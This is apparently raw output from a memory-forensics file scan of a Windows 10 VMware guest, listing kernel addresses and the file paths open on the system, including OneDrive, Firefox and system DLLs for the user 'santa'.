+0x918b769878f0	\Windows\ShellExperiences\TileControl.dll	216
+0x918b76987a80	\Windows\Registration\R000000000006.clb	216
+0x918b76987c10	\Windows\System32\SecurityHealthSystray.exe	216
+0x918b76988250	\Windows\SysWOW64\ExplorerFrame.dll	216
+0x918b76988570	\CMApi	216
+0x918b76988890	\Windows\System32\en-US\user32.dll.mui	216
+0x918b76988a20	\$Directory	216
+0x918b76988bb0	\Windows\System32\vm3dservice.exe	216
+0x918b76988ed0	\Windows\System32\Windows.WARP.JITService.dll	216
+0x918b769891f0	\Program Files\VMware\VMware Tools\vmtoolsd.exe	216
+0x918b76989380	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76989510	\Windows\System32\SecurityHealthProxyStub.dll	216
+0x918b769896a0	\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11172023-155129-7-3f-18362.1.amd64fre.19h1_release.190318-1202.etl	216
+0x918b76989830	\Windows\Registration\R000000000006.clb	216
+0x918b769899c0	\$Directory	216
+0x918b76989b50	\CMApi	216
+0x918b76989ce0	\Windows\SysWOW64\dhcpcsvc6.dll	216
+0x918b7698a190	\Windows\Registration\R000000000006.clb	216
+0x918b7698a320	\Windows\SysWOW64\IPHLPAPI.DLL	216
+0x918b7698a4b0	\$Directory	216
+0x918b7698a7d0	\Windows\System32\vm3dservice.exe	216
+0x918b7698a960	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b7698ae10	\Windows\System32	216
+0x918b7698b130	\Windows\System32	216
+0x918b7698b450	\$Directory	216
+0x918b7698b5e0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7698b770	\Input	216
+0x918b7698b900	\Windows\Fonts\segoeuil.ttf	216
+0x918b7698ba90	\Program Files\VMware\VMware Tools\plugins\vmusr\dndcp.dll	216
+0x918b7698bc20	\Program Files\VMware\VMware Tools\sigc-2.0.dll	216
+0x918b7698bdb0	\Windows\System32\keepaliveprovider.dll	216
+0x918b7698c3f0	\$Directory	216
+0x918b7698c580	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncCxP.dll	216
+0x918b7698c710	\Output	216
+0x918b7698c8a0	\Windows\Fonts\segoeui.ttf	216
+0x918b7698cd50	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7698d200	\CMApi	216
+0x918b7698d520	\Windows\Fonts\times.ttf	216
+0x918b7698d6b0	\Users\santa\AppData\Local\Microsoft\OneDrive\OneDrive.exe	216
+0x918b7698d840	\Windows\System32\mfcore.dll	216
+0x918b7698d9d0	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7698de80	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\en\FileSync.LocalizedResources.dll.mui	216
+0x918b7698e1a0	\Windows\Temp\vmware-vmusr-santa.log	216
+0x918b7698e330	\Windows\Fonts\seguisb.ttf	216
+0x918b7698e4c0	\Program Files\VMware\VMware Tools\plugins\vmusr\desktopEvents.dll	216
+0x918b7698e650	\$Directory	216
+0x918b7698e7e0	\CMApi	216
+0x918b7698e970	\$Directory	216
+0x918b7698eb00	\Windows\System32\wscui.cpl	216
+0x918b7698ee20	\Windows\System32\UIRibbon.dll	216
+0x918b7698f140	\Program Files\VMware\VMware Tools\plugins\vmusr\vmtray.dll	216
+0x918b7698f2d0	\Windows\System32\mfc140enu.dll	216
+0x918b7698f460	\Windows\Registration\R000000000006.clb	216
+0x918b7698f910	\CMApi	216
+0x918b7698fc30	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b7698fdc0	\Windows\System32\mfc140u.dll	216
+0x918b769900e0	\Windows\System32\en-US\mpr.dll.mui	216
+0x918b76990400	\Windows	216
+0x918b76990590	\Windows\System32\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll	216
+0x918b76990720	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.18362.30_none_e685621eb27f4d6a\comctl32.dll	216
+0x918b769908b0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.18362.30_none_e685621eb27f4d6a	216
+0x918b76990a40	\Windows\System32\winevt\Logs\microsoft-windows-diagnosis-scripted%4operational.evtx	216
+0x918b76990d60	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b76990ef0	\CMApi	216
+0x918b76991080	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76991210	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b769913a0	\Windows\System32	216
+0x918b76991530	\Windows\SysWOW64\Windows.UI.dll	216
+0x918b769916c0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncClient.dll	216
+0x918b76991d00	\Windows\Temp\vmware-vmusr-santa.log	216
+0x918b76992340	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140.dll	216
+0x918b769927f0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\vcruntime140_1.dll	216
+0x918b76992b10	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\LoggingPlatform.dll	216
+0x918b76992ca0	\$Directory	216
+0x918b76992e30	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\vcruntime140.dll	216
+0x918b76993150	\Windows\System32\ntlanman.dll	216
+0x918b76993790	\Windows\System32\CapabilityAccessHandlers.dll	216
+0x918b76993ab0	\$Directory	216
+0x918b76993c40	\Windows\SysWOW64\userenv.dll	216
+0x918b769945a0	\Windows\System32\drprov.dll	216
+0x918b769948c0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\ucrtbase.dll	216
+0x918b76994be0	\Windows\System32\davclnt.dll	216
+0x918b76994d70	\Windows\System32\SystemSettings.DataModel.dll	216
+0x918b76995860	\Windows\System32\davhlpr.dll	216
+0x918b76996350	\Program Files (x86)\Mozilla Firefox	216
+0x918b76996e40	\Program Files (x86)\Mozilla Firefox	216
+0x918b769977a0	\Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2351.4628.2.aodl	216
+0x918b76997930	\Program Files (x86)\Mozilla Firefox	216
+0x918b76997960	禸皙醋￿禸皙醋￿	0
+0x918b76997c50	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\OneDriveTelemetryStable.dll	216
+0x918b76997de0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\LogUploader.dll	216
+0x918b76998100	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncViews.dll	216
+0x918b76998290	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\WebView2Loader.dll	216
+0x918b76998420	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFS.dll	216
+0x918b769985b0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncEvents.dll	216
+0x918b76998740	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140_atomic_wait.dll	216
+0x918b769988d0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\WnsClientApi.dll	216
+0x918b76998a60	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Core.dll	216
+0x918b76998bf0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\adal.dll	216
+0x918b76998d80	\CMApi	216
+0x918b769990a0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncRNWin32Lib.dll	216
+0x918b76999230	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Quick.dll	216
+0x918b769993c0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Telemetry.dll	216
+0x918b76999550	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Gui.dll	216
+0x918b769996e0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76999870	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b76999a00	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Qml.dll	216
+0x918b76999b90	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5WinExtras.dll	216
+0x918b76999d20	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncSqlite3.dll	216
+0x918b76999eb0	\Windows\System32\credui.dll	216
+0x918b7699a1d0	\Windows\System32\WinMetadata\Windows.Web.winmd	216
+0x918b7699a360	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\libcrypto-1_1-x64.dll	216
+0x918b7699a4f0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\msvcp140_1.dll	216
+0x918b7699a680	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncTelemetryExtensions.dll	216
+0x918b7699a810	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncHost.dll	216
+0x918b7699a9a0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncSessions.dll	216
+0x918b7699ab30	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\SyncEngine.dll	216
+0x918b7699acc0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b7699ae50	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\UpdateRingSettings.dll	216
+0x918b7699b170	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5Network.dll	216
+0x918b7699b620	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db	216
+0x918b7699b7b0	\MsFteWds	216
+0x918b7699b940	\Windows\System32\Windows.UI.Input.Inking.Analysis.dll	216
+0x918b7699bc60	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7699bdf0	\Windows\System32\en-US\Windows.UI.dll.mui	216
+0x918b7699c110	\$Directory	216
+0x918b7699c2a0	\ProgramData\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b7699c750	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\libssl-1_1-x64.dll	216
+0x918b7699c8e0	\Windows\System32\svchost.exe	216
+0x918b7699cc00	\Windows\System32\efswrt.dll	216
+0x918b7699cd90	\Windows\SystemResources\Chakra.dll.mun	216
+0x918b7699d0b0	\Windows\Fonts\segoeuib.ttf	216
+0x918b7699d3d0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b7699d6f0	\Windows\System32	216
+0x918b7699dba0	\Windows\Fonts\Sitka.ttc	216
+0x918b7699dd30	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\Qt5QmlModels.dll	216
+0x918b7699dec0	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal	216
+0x918b7699e1e0	\Windows\SysWOW64\OneCoreCommonProxyStub.dll	216
+0x918b7699e690	\Windows\System32	216
+0x918b7699e820	\Windows\System32\InkObjCore.dll	216
+0x918b7699e9b0	\Windows\Fonts\SitkaI.ttc	216
+0x918b7699eb40	\Windows\System32\configmanager2.dll	216
+0x918b7699f310	\$Directory	216
+0x918b7699f4a0	\$Directory	216
+0x918b7699f7c0	\Windows\SysWOW64\ntshrui.dll	216
+0x918b7699fc70	\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx	216
+0x918b7699fe00	\Windows\Fonts\SitkaZ.ttc	216
+0x918b769a0120	\Windows\System32\SettingsEnvironment.Desktop.dll	216
+0x918b769a05d0	\Windows\System32\AdaptiveCards.dll	216
+0x918b769a08f0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSNtfs.dll	216
+0x918b769a0a80	\Windows\System32\regapi.dll	216
+0x918b769a0da0	\Dev\Query	216
+0x918b769a13e0	\$Directory	216
+0x918b769a1570	\Windows\SysWOW64\en-US\taskschd.dll.mui	216
+0x918b769a1700	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe	216
+0x918b769a1890	\Windows\Fonts\calibri.ttf	216
+0x918b769a1bb0	\Windows\SysWOW64\policymanager.dll	216
+0x918b769a1d40	\$Directory	216
+0x918b769a1ed0	\Windows\SysWOW64\srvcli.dll	216
+0x918b769a21f0	\Windows\SysWOW64\cscapi.dll	216
+0x918b769a2380	\Windows\System32\en-US\windows.applicationmodel.datatransfer.dll.mui	216
+0x918b769a2510	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01.loglog	216
+0x918b769a2830	\Windows\System32\enterpriseresourcemanager.dll	216
+0x918b769a29c0	\CMApi	216
+0x918b769a2b50	\$Directory	216
+0x918b769a2e70	\Windows\System32\en-US\ole32.dll.mui	216
+0x918b769a3190	\Windows\System32\en-US\avrt.dll.mui	216
+0x918b769a3320	\Windows\System32\en-US\combase.dll.mui	216
+0x918b769a3640	\Reference	216
+0x918b769a37d0	\Windows\System32\dmiso8601utils.dll	216
+0x918b769a3960	\Windows\System32\dmoleaututils.dll	216
+0x918b769a3c80	\Server	216
+0x918b769a3e10	\Windows\SysWOW64\msvcp110_win.dll	216
+0x918b769a4130	\Windows\System32\DictationManager.dll	216
+0x918b769a42c0	\Dev\Query	216
+0x918b769a4450	\Windows\System32\conhost.exe	216
+0x918b769a45e0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log	216
+0x918b769a4770	\$Directory	216
+0x918b769a4900	\$ConvertToNonresident	216
+0x918b769a4a90	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSNtfsWB.dll	216
+0x918b769a4c20	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\platforms\qwindows.dll	216
+0x918b769a4db0	\CMApi	216
+0x918b769a50d0	\Windows\SysWOW64\winsta.dll	216
+0x918b769a5260	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b769a53f0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFALWB.dll	216
+0x918b769a5710	\$Directory	216
+0x918b769a58a0	\$Directory	216
+0x918b769a5a30	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db-wal	216
+0x918b769a5bc0	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SettingsDatabase.db-shm	216
+0x918b769a5d50	\$Directory	216
+0x918b769a5ee0	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSync.Resources.dll	216
+0x918b769a6200	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncFSCache.dll	216
+0x918b769a6390	\Windows\System32\en-US\windows.ui.xaml.dll.mui	216
+0x918b769a6520	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSync.LocalizedResources.dll	216
+0x918b769a66b0	\Dev\Query	216
+0x918b769a6b60	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db	216
+0x918b769a6cf0	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db-wal	216
+0x918b769a6e80	\Users\santa\AppData\Local\Microsoft\OneDrive\settings\Personal\SyncEngineDatabase.db-shm	216
+0x918b769a71a0	\Users\santa\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-11-17_235151_4628-4616.log	216
+0x918b769a7330	\$Directory	216
+0x918b769a74c0	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b769a7c90	\gecko.4576.3988.4196779259130090733	216
+0x918b769a8140	\Windows\Fonts\arial.ttf	216
+0x918b769a82d0	\Windows\System32\ELSCore.dll	216
+0x918b769a8780	\Windows\System32\MicrosoftAccountTokenProvider.dll	216
+0x918b769a8910	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b769a8aa0	\CMApi	216
+0x918b769a90e0	\Windows\System32\Wpc.dll	216
+0x918b769a9590	\Program Files (x86)\Mozilla Firefox	216
+0x918b769a9720	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b769a98b0	\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi	216
+0x918b769a9a40	\Windows\System32\en-US\SHCore.dll.mui	216
+0x918b769a9d60	\gecko.4576.3988.4196779259130090733	216
+0x918b769aa080	\Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\en\FileSync.LocalizedResources.dll.mui	216
+0x918b769aa210	\Users\santa\AppData\Local\Microsoft\Credentials	216
+0x918b769aa3a0	\Users\santa\AppData\Roaming\Microsoft\Credentials	216
+0x918b769aa850	\Windows\System32\msIso.dll	216
+0x918b769aa9e0	\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat.LOG2	216
+0x918b769aab70	\$Directory	216
+0x918b769aae90	\gecko.4576.3988.14258203149884878546	216
+0x918b769ab340	\$Directory	216
+0x918b769ab4d0	\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20231117_235156_845.etl	216
+0x918b769ab7f0	\$Directory	216
+0x918b769ab980	\Windows\System32\ngcpopkeysrv.dll	216
+0x918b769abca0	\Windows\Fonts\tahomabd.ttf	216
+0x918b76abd9d0	\$NonCachedIo	216
+0x918b76abdb40	\$NonCachedIo	216
+0x918b76ac0660	\$NonCachedIo	216
+0x918b76c2b1e0	\Windows\Prefetch\SEARCHPROTOCOLHOST.EXE-C6CFE2A8.pf	216
+0x918b76c2b370	\Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui	216
+0x918b76c2b500	\Windows\SystemResources\Windows.UI.ShellCommonInetCore\Windows.UI.ShellCommonInetCore.pri	216
+0x918b76c2b820	\Windows\System32\backgroundTaskHost.exe	216
+0x918b76c2b9b0	\Windows\System32\en-US\AppXDeploymentServer.dll.mui	216
+0x918b76c2bb40	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eView.dll	216
+0x918b76c2bcd0	\CMNotify	216
+0x918b76c2be60	\Windows\System32\dsclient.dll	216
+0x918b76c2c180	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b76c2c310	\Windows\System32\StorageUsage.dll	216
+0x918b76c2c4a0	\Windows	216
+0x918b76c2c630	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxTsr.exe	216
+0x918b76c2c950	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b76c2cae0	\CMNotify	216
+0x918b76c2cc70	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76c2ce00	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76c2d120	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b76c2d2b0	\Windows\Fonts\segoeuil.ttf	216
+0x918b76c2d5d0	\CMNotify	216
+0x918b76c2d760	\Windows\Fonts\cambriaz.ttf	216
+0x918b76c2d8f0	\Windows\System32\en-US\ntasn1.dll.mui	216
+0x918b76c2da80	\Sessions\1\AppContainerNamedObjects\S-1-15-2-2551677095-2355568638-4209445997-2436930744-3692183382-387691378-1866284433	216
+0x918b76c2dc10	\$Directory	216
+0x918b76c2dda0	\CMNotify	216
+0x918b76c2e0c0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db	216
+0x918b76c2e250	\Windows\System32\StorSvc.dll	216
+0x918b76c2e3e0	\Windows\SystemResources\ExplorerFrame.dll.mun	216
+0x918b76c2e700	\Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2323.5328.2.odlgz	216
+0x918b76c2e890	\$Directory	216
+0x918b76c2ea20	\$Directory	216
+0x918b76c2ebb0	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json	216
+0x918b76c2ed40	\Windows\System32\backgroundTaskHost.exe	216
+0x918b76c2eed0	\$Directory	216
+0x918b76c2f1f0	\Windows\System32	216
+0x918b76c2f380	\Windows\Prefetch\TRUSTEDINSTALLER.EXE-B018CCBF.pf	216
+0x918b76c2f510	\Windows\System32\backgroundTaskHost.exe	216
+0x918b76c2f6a0	\Windows\System32\en-US\jscript9.dll.mui	216
+0x918b76c2f830	\Windows\System32	216
+0x918b76c2f9c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b76c2fce0	\wkssvc	216
+0x918b76c2fe70	\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx	216
+0x918b76c30190	\Windows\Prefetch\MUSNOTIFYICON.EXE-19B43B6D.pf	216
+0x918b76c304b0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a52b0784bd667468.automaticDestinations-ms	216
+0x918b76c30640	\Windows\explorer.exe	216
+0x918b76c307d0	\Users\santa\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2023-11-17.2351.4628.1.odlgz	216
+0x918b76c30960	\Windows\System32\SyncRes.dll	216
+0x918b76c30af0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms	216
+0x918b76c30c80	\$Directory	216
+0x918b76c30e10	\Sessions\1\AppContainerNamedObjects\S-1-15-2-1609473798-1231923017-684268153-4268514328-882773646-2760585773-1760938157	216
+0x918b76c31130	\Windows\System32\PhoneutilRes.dll	216
+0x918b76c312c0	\Connect	216
+0x918b76c31450	\Windows\System32\en-US\Conhost.exe.mui	216
+0x918b76c315e0	\Windows\Prefetch\GAMEBAR.EXE-E79FA3B9.pf	216
+0x918b76c31770	\$Directory	216
+0x918b76c31a90	\Windows\System32\wscproxystub.dll	216
+0x918b76c31c20	\Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe	216
+0x918b76c31db0	\ProgramData\USOShared\Logs\UsoCoreWorker.5922ac36-0a80-4ccf-8043-a7181bce1717.1.etl	216
+0x918b76c32260	\Windows\System32	216
+0x918b76c323f0	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\wdscore.dll	216
+0x918b76c32580	\Windows\System32\SgrmEnclave.dll	216
+0x918b76c32710	\Windows\servicing\en-US\TrustedInstaller.exe.mui	216
+0x918b76c328a0	\Windows\System32\SgrmBroker.exe	216
+0x918b76c32a30	\$Directory	216
+0x918b76c32bc0	\CMApi	216
+0x918b76c32d50	\Windows	216
+0x918b76c32ee0	\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	216
+0x918b76c33200	\Windows\Registration\R000000000006.clb	216
+0x918b76c33520	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b76c336b0	\Windows\System32\MusNotification.exe	216
+0x918b76c33840	\Windows\System32\en-US\user32.dll.mui	216
+0x918b76c339d0	\Windows\System32\config\COMPONENTS	216
+0x918b76c33b60	\$Directory	216
+0x918b76c33cf0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b76c341a0	\Windows\Logs\CBS\CBS.log	216
+0x918b76c34330	\$Directory	216
+0x918b76c34650	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b76c34970	\$Directory	216
+0x918b76c34b00	\Windows\System32\SecurityCenterBroker.dll	216
+0x918b76c34c90	\Windows\System32\svchost.exe	216
+0x918b76c34e20	\Windows\System32\wscsvc.dll	216
+0x918b76c352d0	\Windows\System32\vaultsvc.dll	216
+0x918b76c355f0	\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B	216
+0x918b76c35780	\ProgramData\USOShared\Logs\UpdateSessionOrchestration.995347a8-2a9e-48af-bbd5-03147fb77e7a.1.etl	216
+0x918b76c35910	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\TiWorker.exe	216
+0x918b76c35aa0	\Users\santa\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper	216
+0x918b76c35c30	\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	216
+0x918b76c35dc0	\Users\desktop.ini	216
+0x918b76c360e0	\Windows\System32\vbsapi.dll	216
+0x918b76c36270	\Windows\Registration\R000000000006.clb	216
+0x918b76c36590	\$Directory	216
+0x918b76c36720	\Windows\System32\en-US\Windows.Web.dll.mui	216
+0x918b76c368b0	\Windows\System32\en-US\dps.dll.mui	216
+0x918b76c36a40	\Windows\servicing\CbsApi.dll	216
+0x918b76c36bd0	\Windows\Logs\waasmedic\waasmedic.20231118_133142_776.etl	216
+0x918b76c36d60	\Windows\System32	216
+0x918b76c36ef0	\$Directory	216
+0x918b76c37080	\Windows\Prefetch\TIWORKER.EXE-2CF725E4.pf	216
+0x918b76c37210	\Windows\System32\usosvc.dll	216
+0x918b76c37530	\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-A7A4C1BC.pf	216
+0x918b76c376c0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b76c37850	\$Directory	216
+0x918b76c379e0	\Windows\System32\Phoneutil.dll	216
+0x918b76c37b70	\Windows\System32	216
+0x918b76c37e90	\Server	216
+0x918b76c381b0	\Reference	216
+0x918b76c38340	\Windows\System32\syncutil.dll	216
+0x918b76c387f0	\Windows\System32\InprocLogger.dll	216
+0x918b76c38980	\Windows\System32\SecurityCenterBrokerPS.dll	216
+0x918b76c39150	\Windows\System32\dmcfgutils.dll	216
+0x918b76c392e0	\Windows\System32\APHostService.dll	216
+0x918b76c39470	\Windows\Registration\R000000000006.clb	216
+0x918b76c39600	\Windows\System32\MCCSPal.dll	216
+0x918b76c39790	\Windows\System32\dmxmlhelputils.dll	216
+0x918b76c39920	\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll	216
+0x918b76c39ab0	\Windows\System32\clbcatq.dll	216
+0x918b76c39dd0	\Windows\System32\SyncController.dll	216
+0x918b76c3a0f0	\Windows\System32\UserDataPlatformHelperUtil.dll	216
+0x918b76c3a280	\Windows\System32\UserDataLanguageUtil.dll	216
+0x918b76c3a410	\Windows\System32\cemapi.dll	216
+0x918b76c3a5a0	\Windows\System32\en-US\combase.dll.mui	216
+0x918b76c3a730	\Windows\System32\en-US\wscapi.dll.mui	216
+0x918b76c3a8c0	\Windows\System32\networkhelper.dll	216
+0x918b76c3aa50	\Windows\System32\MCCSEngineShared.dll	216
+0x918b76c3abe0	\Windows\SysWOW64\CoreMessaging.dll	216
+0x918b76c3ad70	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5	216
+0x918b76c3b090	\$Directory	216
+0x918b76c3b220	\Windows\System32\en-US\vaultsvc.dll.mui	216
+0x918b76c3b3b0	\Output	216
+0x918b76c3b540	\CMApi	216
+0x918b76c3b860	\$Directory	216
+0x918b76c3b9f0	\Input	216
+0x918b76c3bb80	\Windows\System32\conhost.exe	216
+0x918b76c3bd10	\Windows\Prefetch\SEARCHFILTERHOST.EXE-10E4267C.pf	216
+0x918b76c3bea0	\Windows\System32\en-US\wscapi.dll.mui	216
+0x918b76c3c1c0	\$Directory	216
+0x918b76c3c4e0	\$Directory	216
+0x918b76c3c670	\Windows\SysWOW64\netapi32.dll	216
+0x918b76c3c800	\Windows\System32\en-US\winlogon.exe.mui	216
+0x918b76c3ccb0	\CMApi	216
+0x918b76c3ce40	\Windows\SysWOW64\dsreg.dll	216
+0x918b76c3d160	\Windows\SysWOW64\netutils.dll	216
+0x918b76c3d2f0	\Users\santa\AppData\Local\Temp\MicrosoftEdgeUpdate.log	216
+0x918b76c3d480	\Windows\Logs\CBS\CBS.log	216
+0x918b76c3d610	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json	216
+0x918b76c3d7a0	\$Directory	216
+0x918b76c3d930	\Windows\Registration\R000000000006.clb	216
+0x918b76c3dac0	\Windows\SysWOW64\wkscli.dll	216
+0x918b76c3dc50	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdate.dll	216
+0x918b76c3dde0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76c3e100	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b76c3e290	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\dpx.dll	216
+0x918b76c3e420	\CMNotify	216
+0x918b76c3e5b0	\Windows\System32\usocoreworker.exe	216
+0x918b76c3e740	\Windows\Fonts\seguiemj.ttf	216
